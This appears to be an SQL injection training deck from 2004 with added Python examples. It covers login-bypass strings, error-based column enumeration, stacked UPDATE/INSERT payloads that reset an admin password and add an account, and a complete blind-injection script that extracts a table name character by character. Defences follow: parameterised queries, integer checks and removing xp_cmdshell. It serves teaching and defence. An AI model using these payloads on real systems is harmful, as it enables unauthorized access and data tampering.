Agenda
- What is SQL Injection
- SQL Injection possibilities
- Technologies affected by SQL Injections
- Types of SQL Injections
- Techniques in SQL Injections
- How to use Blind SQL Injections
- How to use SQL Injections
- How to use Advanced SQL Injections
- How to update data in the database
- How to avoid SQL Injections
- Next generation of hacking tools for SQL Injections
Copyright Kenexa 2004
Using SQL injection, attackers can:
- Add new data to the database, by performing an INSERT in the injected SQL. It could be embarrassing to find yourself selling politically incorrect items on an eCommerce site.
- Modify data currently in the database, by performing an UPDATE in the injected SQL. It could be very costly to have an expensive item suddenly be deeply discounted.
- Often gain access to other users' capabilities in the system by obtaining their passwords.
Technologies affected by SQL injection:
- JSP
- ASP
- XML, XSL
- JavaScript, VB
- MFC and other ODBC-based tools
- APIs, and 3GL- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
- Perl and CGI scripts that access Oracle databases
- many more
- Authorization bypass
- Using the SELECT command
- Using the INSERT command
- Using SQL Server stored procedures
Step 6 - If no press release is returned, the ASCII value is greater than 109 but not greater than 116. So, the letter is between n (110) and t (116). The next probe halves that range again:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113
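The page only keeps Step 6 of the blind injection walk-through, so the following added example (not code from the original deck) carries the whole procedure through: the same "press release returned or not" bit is used as a yes/no oracle, and each character of the first user table name is recovered by binary search over its ASCII value, exactly as the > 109 / > 116 / > 113 probes do. SQLite stands in for SQL Server, so the constructed endpoint uses sqlite_master, LIMIT 1 and substr where the page's payload uses sysobjects, TOP 1 and substring; an ascii() function is registered so the injected predicate reads like the T-SQL one. Table names and data are constructed for the example.

```python
"""Boolean-based blind SQL injection as a binary search, one character at a time.

Constructed stand-in for the pressRelease.jsp example: SQLite plays SQL Server,
so sysobjects / TOP 1 / substring become sqlite_master / LIMIT 1 / substr.
"""
from __future__ import annotations

import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database: two user tables and a few press releases."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pressRelease (pressReleaseID INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin_login (login_id INTEGER, login_name TEXT, password TEXT);
        INSERT INTO pressRelease VALUES (5, 'Q3 results'), (6, 'New office');
        """
    )
    # T-SQL has ascii(); SQLite does not, so register one.
    # substr() past the end of the name returns '' -> 0, which marks the end of the string.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def press_release_exists(conn: sqlite3.Connection, press_release_id: str) -> bool:
    """The vulnerable endpoint: pressReleaseID is concatenated straight into the query.
    The page either shows a release (True) or nothing (False); that single bit is the oracle."""
    sql = "SELECT title FROM pressRelease WHERE pressReleaseID=" + press_release_id
    return conn.execute(sql).fetchone() is not None


# Injected subquery: the first user table name (SQLite form of "SELECT TOP 1 name FROM sysobjects WHERE xtype='U'").
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"


def recover_first_table_name(conn: sqlite3.Connection) -> tuple[str, int]:
    """Recover the table name character by character. Returns (name, number of requests sent)."""
    requests = 0

    def ask(pos: int, threshold: int) -> bool:
        """One request: is ascii(lower(char at pos)) > threshold?"""
        nonlocal requests
        requests += 1
        payload = f"5 AND ascii(lower(substr({FIRST_TABLE}, {pos}, 1))) > {threshold}"
        return press_release_exists(conn, payload)

    name = ""
    pos = 1
    while ask(pos, 0):            # ascii > 0: there is a character at this position
        lo, hi = 0, 127           # invariant: lo < value <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(pos, mid):     # a release came back, so the value is greater than mid
                lo = mid
            else:                 # nothing came back, so the value is at most mid
                hi = mid
        name += chr(hi)           # at most 7 probes per character
        pos += 1
    return name, requests


if __name__ == "__main__":
    name, requests = recover_first_table_name(build_db())
    print(f"first user table: {name!r} recovered in {requests} requests")
```

Each character costs at most eight requests (one end-of-string check plus a seven-step halving of 0..127), which is why the deck's probes jump by halves rather than walking the alphabet; in practice an attacker narrows the initial range to printable characters and runs positions in parallel.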
Here is a sample basic HTML form with two inputs, login and password:
<form method="post" action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>
The easiest way for login.asp to work is by building a database query that looks like this:
SELECT id FROM logins WHERE username = '$username' AND password = '$password'
If the variables $username and $password are taken directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password:
anything' OR 'x'='x
The resulting query is:
SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x'
As the inputs of the web application are not properly sanitised, the single quotes have turned the WHERE clause into two components joined by OR. The 'x'='x' part is guaranteed to be true regardless of what the first part contains, so the query returns rows for every user. This allows the attacker to bypass the login form without knowing a valid username / password combination! Depending on the actual SQL query, you may have to try some of these variants (the trailing -- comments out the rest of the original statement):
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
The previous 'username' produces the error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
Each error names the next column that is missing from the GROUP BY, so the attacker adds it and repeats. Eventually the attacker arrives at the following 'username':
' group by users.id, users.username, users.password, users.privs having 1=1--
which produces no error, and is functionally equivalent to:
select * from users where username = ''
It would be useful if the attacker could also determine the type of each column. This can be achieved with a 'type conversion' error message: applying sum() to a non-numeric column makes SQL Server report the conversion failure, and the message includes the column's type. Username:
' union select sum(username) from users--
Once we have gathered all the column names of a table, we can UPDATE or even INSERT a new record in the table by appending a second statement after a semicolon (SQL Server executes stacked statements in one batch). For example, to change the password for "neo":
http://duck/index.asp?id=10; UPDATE admin_login SET password = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--
We can now log in as "neo2" with the password "newpas5".
Filter out characters such as single quote, double quote, slash, backslash, semicolon, and extended characters such as NUL, carriage return and new line in all strings that come from:
- input from users
- parameters in the URL
- values from cookies
For a numeric value, convert it to an integer before placing it in the SQL statement, or use ISNUMERIC to check it. Note that ISNUMERIC also returns 1 for values such as '$', '+' and '1e3', so an explicit integer conversion is the stronger check. Filtering is a defence in depth measure; the reliable fix is to pass user input to the database as bind parameters rather than building the statement by string concatenation.
Change "Startup and run SQL Server" to use a low-privilege account in the SQL Server Security tab.
Remove stored procedures that you are not using, such as master..xp_cmdshell, xp_startmail, xp_sendmail and sp_makewebtask.
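The following added example (not code from the original deck) ties the login bypass shown earlier to the defences listed here. It builds the deck's login query both ways: by string concatenation, which the password `anything' OR 'x'='x` bypasses, and with bind parameters, which treat the quote as data. For the numeric index.asp?id= case it applies the "convert to an integer first" advice with a strict check that rejects the stacked `10; UPDATE ...` payload and also the '$' and '1e3' strings ISNUMERIC would accept. SQLite stands in for SQL Server; the logins and admin_login tables and their rows are constructed for the example.

```python
"""Login bypass by string concatenation, beside the parameterised and integer-checked forms.

Constructed stand-in: SQLite replaces SQL Server and the ASP pages; table and column
names follow the deck's examples (logins, admin_login) and the rows are made up.
"""
from __future__ import annotations

import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database with one ordinary user table and one admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO logins VALUES (1, 'Joe', 's3cret'), (2, 'neo', 'matrix');
        CREATE TABLE admin_login (login_id INTEGER PRIMARY KEY, login_name TEXT,
                                  password TEXT, details TEXT);
        INSERT INTO admin_login VALUES (10, 'neo', 'oldpass', 'NA');
        """
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> int | None:
    """login.asp as the deck describes it: values pasted into the SQL text.
    Returns the id of the first matching row, or None."""
    sql = f"SELECT id FROM logins WHERE username = '{username}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> int | None:
    """Same query with bind parameters: the quote inside the password is data, never SQL."""
    row = conn.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?", (username, password)
    ).fetchone()
    return row[0] if row else None


def parse_id(value: str) -> int | None:
    """Strict integer check for a URL parameter such as index.asp?id=10.
    Only a short run of digits is accepted, so '10; UPDATE ...', '$' and '1e3' are all rejected."""
    if re.fullmatch(r"[0-9]{1,9}", value) is None:
        return None
    return int(value)


def admin_details(conn: sqlite3.Connection, id_param: str) -> str | None:
    """index.asp?id=... hardened: validate the integer first, then bind it."""
    login_id = parse_id(id_param)
    if login_id is None:
        return None
    row = conn.execute(
        "SELECT details FROM admin_login WHERE login_id = ?", (login_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    bypass = "anything' OR 'x'='x"
    print("vulnerable login as Joe with bypass password ->", login_vulnerable(db, "Joe", bypass))
    print("parameterised login as Joe with bypass password ->", login_parameterized(db, "Joe", bypass))
    print("admin_details('10') ->", admin_details(db, "10"))
    print("admin_details(stacked UPDATE) ->", admin_details(db, "10; UPDATE admin_login SET password='newpas5'--"))
```

The vulnerable function returns Joe's id for the bypass password because the injected OR makes the WHERE clause true for every row; the parameterised version returns None because the whole string is compared against the password column. The digit-only check is deliberately stricter than ISNUMERIC, which in SQL Server also accepts currency symbols, signs and exponent notation.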
- Ethical Hacking
- Server-side scripting
- Client-side scripting
- Bluetooth hacking
- Console hacking
- SQID - SQL Injection Digger
- SQLBrute - SQL Injection Brute Force Tool
- N-Stalker Web Application Security Scanner 2006
- Acunetix Web Vulnerability Scanner
- HP WebInspect
- Wikto: Web Server Assessment Tool
www.kenexa.com